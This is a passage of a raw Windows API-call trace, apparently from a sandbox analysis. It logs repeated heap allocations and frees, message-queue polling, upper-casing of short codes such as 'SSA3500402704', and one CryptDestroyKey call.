RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.382] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.382] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.383] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.383] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.383] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.388] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.389] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.389] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.392] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0161.392] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.392] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0161.392] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.392] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.392] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.392] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.393] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.393] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.393] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.394] CryptDestroyKey (hKey=0xaa5660) returned 1 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.395] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.396] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.397] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.397] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.397] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.398] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.398] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.398] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0161.398] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.399] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.399] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.399] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0161.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.401] RtlAllocateHeap 